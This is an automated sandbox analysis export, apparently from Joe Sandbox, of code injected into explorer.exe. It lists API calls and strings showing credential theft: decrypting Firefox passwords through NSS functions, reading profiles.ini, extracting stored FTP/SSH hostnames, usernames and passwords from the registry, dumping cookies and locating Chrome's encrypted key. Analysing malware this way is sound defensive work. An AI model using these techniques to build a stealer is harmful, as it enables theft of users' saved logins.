                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 000C259E
                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000C25AB
                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000C25B8
                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000C25C5
                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000C25D2
                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000C25DF
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                        • API String ID: 3366569387-3272982511
                                                        • Opcode ID: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
                                                        • Instruction ID: f27eb7f9fdc0b117fc65d383f015153ce6af75afbe9925de09a55da9ba8c9da4
                                                        • Opcode Fuzzy Hash: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
                                                        • Instruction Fuzzy Hash: A3414835A00315ABCB28EF349D54FEE7AE59B96740B10003EF851D3AA3DB758C878B61
                                                        APIs
                                                          • Part of subcall function 000C5BF5: memset.NTDLL ref: 000C5C07
                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C60E1
                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C60EC
                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 000C6113
                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C618E
                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C61B5
                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C61C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _alldiv$_allrem$memset
                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                        • API String ID: 2557048445-1989508764
                                                        • Opcode ID: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                        • Instruction ID: 502cfbf67b18a962bf2db5a4d44a48d6e4ebfb69120bd35f6eeed1c98243c828
                                                        • Opcode Fuzzy Hash: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                        • Instruction Fuzzy Hash: 8CB182B1908B42ABD7399F24CC85F7F7FD4EB80344F24066DF482A62D2E722DD918691
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcmp
                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                        • API String ID: 1475443563-3683840195
                                                        • Opcode ID: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                        • Instruction ID: fe290169e0ce38446e0540a888359f41ab26a7e6bb3f0bce88348ddb2ddbfa1c
                                                        • Opcode Fuzzy Hash: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                        • Instruction Fuzzy Hash: 5E51DF31508700ABC7649F64CC91AABB7E6EB45300F14487FF9969B382E771ED45CBA2
                                                        APIs
                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C2AD2
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C29E1
                                                        • lstrlen.KERNEL32(00000000), ref: 000C29EC
                                                        • wsprintfA.USER32 ref: 000C2A38
                                                        • lstrlen.KERNEL32(00000000), ref: 000C2A44
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000C2A6C
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 000C2A99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                        • API String ID: 304071051-2605711689
                                                        • Opcode ID: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                        • Instruction ID: 6590630dc8a207623c16ac02fe2defee39dcf0182e8ea07b300ef6e5e98ee674
                                                        • Opcode Fuzzy Hash: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                        • Instruction Fuzzy Hash: 3F519E306083469BC729EF209851FBE77EAAF8A704F04482DF8859B653DB36DC458752
                                                        APIs
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 000C2D13
                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 000C2D45
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,0011637C,?,00000FFF,?), ref: 000C2D68
                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 000C2D7B
                                                        • lstrlenW.KERNEL32(00000000), ref: 000C2DD8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                        • API String ID: 2234428054-4107377610
                                                        • Opcode ID: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
                                                        • Instruction ID: f4fb6b58b6dc00fad621c98ce7d2a5ce087e367b1053133f06ae5d2d601b58fc
                                                        • Opcode Fuzzy Hash: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
                                                        • Instruction Fuzzy Hash: E53170307043029BC664AF709951FAF76E2AFDA700F10843DF946A7693DBB68C869752
                                                        APIs
                                                          • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                          • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                          • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4845
                                                          • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C488F
                                                          • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4897
                                                        • wsprintfW.USER32 ref: 000C49A7
                                                        • wsprintfW.USER32 ref: 000C49B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                        • API String ID: 2889301010-4273187114
                                                        • Opcode ID: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
                                                        • Instruction ID: a8b09345e69ff1ba66a2465c1b4e31cc8dab7fd639ae0f15a18bb21264fc0e70
                                                        • Opcode Fuzzy Hash: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
                                                        • Instruction Fuzzy Hash: 5B310130B043246BC714EB65CC65FAFB6EDEFCA784B05491DB00083282DBB2CC4283A2
                                                        APIs
                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 000CFB32
                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB4D
                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB60
                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 000CFB95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID: -journal$-wal$immutable$nolock
                                                        • API String ID: 3510742995-3408036318
                                                        • Opcode ID: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
                                                        • Instruction ID: c89defe6d0ec5f2e348624996de8f07d2a3918ed32f10c12a661b1774d24ac5e
                                                        • Opcode Fuzzy Hash: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
                                                        • Instruction Fuzzy Hash: EFD1C2B16083429FDB54DF28C881B6EBBE2AF95310F08457DF8998B392DB75D805CB52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %$-x0$NaN
                                                        • API String ID: 0-62881354
                                                        • Opcode ID: 1f87efaaba1fee79add35bd9cc08fce12440bd0c0f297eea647123ba31e58b4e
                                                        • Instruction ID: 2846519d4a6e4ce3f269d2e408c114d7b22045f5ff8cdb487a6a7542025fffbd
                                                        • Opcode Fuzzy Hash: 1f87efaaba1fee79add35bd9cc08fce12440bd0c0f297eea647123ba31e58b4e
                                                        • Instruction Fuzzy Hash: A1D1E27060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665C985DF82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        • Opcode ID: f1684721801c51636d9e7cfdca5a507d959a7a8fa1aee60da40d0f8f337b0ba3
                                                        • Instruction ID: 740b431186cbd86f8beda1b7881111a455780db19083a412a37fa82ce740fb92
                                                        • Opcode Fuzzy Hash: f1684721801c51636d9e7cfdca5a507d959a7a8fa1aee60da40d0f8f337b0ba3
                                                        • Instruction Fuzzy Hash: 38E1F13060C3828BD7758B288490F6EBBE1AFD5304F28496DF8CA97392D665CD85DF42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        • Opcode ID: d11ac3931c9dcbdf64c11220ffdcdad05de039478f86599600d604ead2a3fca6
                                                        • Instruction ID: 49cfba68ecb272604455ab1bf93e6065161ddbaac16dd1229a547ce8d9fa3cb2
                                                        • Opcode Fuzzy Hash: d11ac3931c9dcbdf64c11220ffdcdad05de039478f86599600d604ead2a3fca6
                                                        • Instruction Fuzzy Hash: F2E1D07060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665CD85DB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        • Opcode ID: 5ae9f130e295ecc918f38888d72d74336ee56103749728bc1bf10e18509c401b
                                                        • Instruction ID: 330c28c3a8c259f09a395ee402843b1e1ee634393dab25b9175627596b395c55
                                                        • Opcode Fuzzy Hash: 5ae9f130e295ecc918f38888d72d74336ee56103749728bc1bf10e18509c401b
                                                        • Instruction Fuzzy Hash: 41E1D17060C3828BD7758F288490F6EBBE1AFD9304F28496DF8C997252D665CD85DF82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        • Opcode ID: 12c5b43fe113939aaceb655c91f85d05b91aaa74e882c37652a697ff0788fd34
                                                        • Instruction ID: 3e2e44be8ce5833cedf5209992f3b6124b63f10efd9ff1d5558781f21c33e25c
                                                        • Opcode Fuzzy Hash: 12c5b43fe113939aaceb655c91f85d05b91aaa74e882c37652a697ff0788fd34
                                                        • Instruction Fuzzy Hash: 01E1C07060C3828BD7758F288490B6EBBE1AFD9304F28486EF8C997352D665C985DF52
                                                        APIs
                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 000C720E
                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 000C7226
                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 000C727B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _aulldvrm$_aullrem
                                                        • String ID: -x0$NaN
                                                        • API String ID: 105165338-3447725786
                                                        • Opcode ID: 697a355066af11d687313151855d968ba20047efb11636d4341a035609d3aa1b
                                                        • Instruction ID: 095dbadfaab6f1bee5de8b21bd2d2e33f27f2685042f1941eef9401a89e760a0
                                                        • Opcode Fuzzy Hash: 697a355066af11d687313151855d968ba20047efb11636d4341a035609d3aa1b
                                                        • Instruction Fuzzy Hash: EED1D17060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665C985DF42
                                                        APIs
                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 000C8AAD
                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 000C8B66
                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 000C8C9B
                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 000C8CAE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _allmul$_alldvrm
                                                        • String ID: .
                                                        • API String ID: 115548886-248832578
                                                        • Opcode ID: f11f46264f1b6b686032050282387c4c62a0e9e1c11a8a3e6ee38c67af6638e3
                                                        • Instruction ID: c3149298e95e9918c44611cf8e246113e996e8021401bd2d5001290e625d50f0
                                                        • Opcode Fuzzy Hash: f11f46264f1b6b686032050282387c4c62a0e9e1c11a8a3e6ee38c67af6638e3
                                                        • Instruction Fuzzy Hash: 62D106B190C7858BC724DF088884B7EBBF0FBD5315F04896EF6C696291DBB1C945878A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID: ,$7$9
                                                        • API String ID: 2221118986-1653249994
                                                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                        • Instruction ID: a93434c1d82605a0d62f71d02381052b5582f2d7eb856f10f18e2b53618c85e9
                                                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                        • Instruction Fuzzy Hash: 2B316A715083849FD374DF60D840B8FBBE9AB85340F00892EF98997252EB719549CBA2
                                                        APIs
                                                        • lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                        • StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                        • lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: .exe
                                                        • API String ID: 1659193697-4119554291
                                                        • Opcode ID: adc4d391923bc5eb2d88b03df1ecb30fe94817b9363fbb4fc9487718162ebe22
                                                        • Instruction ID: 50335f77f410bd166654ed93a2edc7e36a47193c3495a10abe623a915ced33e0
                                                        • Opcode Fuzzy Hash: adc4d391923bc5eb2d88b03df1ecb30fe94817b9363fbb4fc9487718162ebe22
                                                        • Instruction Fuzzy Hash: 77F0AF30351220AAD3686B34AD85FFE62E5EF06341720882EF042C21A2EB618C818759
                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 000D316F
                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 000D31D2
                                                        • _alldiv.NTDLL(?,?,00000000), ref: 000D32DE
                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 000D32E7
                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 000D3392
                                                          • Part of subcall function 000D16CD: memset.NTDLL ref: 000D172B
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _allmul$_alldivmemset
                                                        • String ID:
                                                        • API String ID: 3880648599-0
                                                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                        • Instruction ID: 551e23537cbf28cbaa0111fc500c72726314421728c196db4da424fe4a208fff
                                                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                        • Instruction Fuzzy Hash: 12D19A716083418BDB64DF69C580BAEBBE1AF88704F14492EF98593352DB70DE45CBA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                        • API String ID: 0-384346570
                                                        • Opcode ID: daca8e84365f49d8f5c49dd0c85ac85ddbcba5b303c768c0027d9fd21ad7cb59
                                                        • Instruction ID: 2c319ea1fd1de208a8c5170f7e236527ba77f4ec40f88acc92fbac28408f6ca7
                                                        • Opcode Fuzzy Hash: daca8e84365f49d8f5c49dd0c85ac85ddbcba5b303c768c0027d9fd21ad7cb59
                                                        • Instruction Fuzzy Hash: 52D15A707083449FD714DB25C481BBFBBE9ABC8740F10891EFA459B292DB74E941DB92
                                                        APIs
                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000C96E7
                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9707
                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9739
                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 000C976C
                                                        • _allmul.NTDLL(?,?,?,?), ref: 000C9798
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _alldiv$_allmul
                                                        • String ID:
                                                        • API String ID: 4215241517-0
                                                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                        • Instruction ID: 4ed6ead1f767992a85970b8ac00d8c1b2ddcd2bb71c232838737eade47b59abf
                                                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                        • Instruction Fuzzy Hash: 2C213B3111E7655AD7745F555CCCFAF75C9DBE1790F26033EFD01D2292EA528C4080A1
                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 000DB1B3
                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 000DB20F
                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 000DB28A
                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 000DB298
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                        • String ID:
                                                        • API String ID: 1484705121-0
                                                        • Opcode ID: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
                                                        • Instruction ID: b873d65e9b63ac81ef1da006d040e5bcd4b0801f6b89ffab2c9cb743b954abd3
                                                        • Opcode Fuzzy Hash: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
                                                        • Instruction Fuzzy Hash: 1E4139756083019BC758EF19C89196FBBE6AFC8300F45492EF99987352DB31EC45CB62
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _alldiv_allmul
                                                        • String ID: winTruncate1$winTruncate2
                                                        • API String ID: 727729158-470713972
                                                        • Opcode ID: 482d2d8b92fad3d3c1ab01ce1a76c8f065e84a1b23a4b7e17941d4475c5f922e
                                                        • Instruction ID: 4e31deaf33b0b32424edf6d718150874822a81b94d0374523af5d6a0118ce064
                                                        • Opcode Fuzzy Hash: 482d2d8b92fad3d3c1ab01ce1a76c8f065e84a1b23a4b7e17941d4475c5f922e
                                                        • Instruction Fuzzy Hash: 2721AE31305108ABCF648F29CC85FAF77A9EB86318B15822DFD14CB295D634D8508762
                                                        APIs
                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 000C18A7
                                                        • GlobalFix.KERNEL32(000C4B57), ref: 000C18B6
                                                        • GlobalUnWire.KERNEL32(?), ref: 000C18F4
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C18E8
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                                        • String ID:
                                                        • API String ID: 2207111602-0
                                                        • Opcode ID: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                        • Instruction ID: 09e2922cd47ef2ddb887db81ecddd7a3827ca7cc636d0a6fc96dbb30dc5c6181
                                                        • Opcode Fuzzy Hash: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                        • Instruction Fuzzy Hash: 9801AD35204306AF8B059F659D18EDF7BEAEF8A350B10C42EF80583222DF32CD448A20
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1475610065-0
                                                        • Opcode ID: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                        • Instruction ID: 4d30f8789ad44f5c05cacdb9ce11480449c1b5baaced4d312f7891b0442361bf
                                                        • Opcode Fuzzy Hash: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                        • Instruction Fuzzy Hash: 16E0656270021C1B475477AE5C94EFB76DCCBC96A53050039FA08D3203E966DC0546B0
                                                        APIs
                                                        • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                        • lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                        • StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
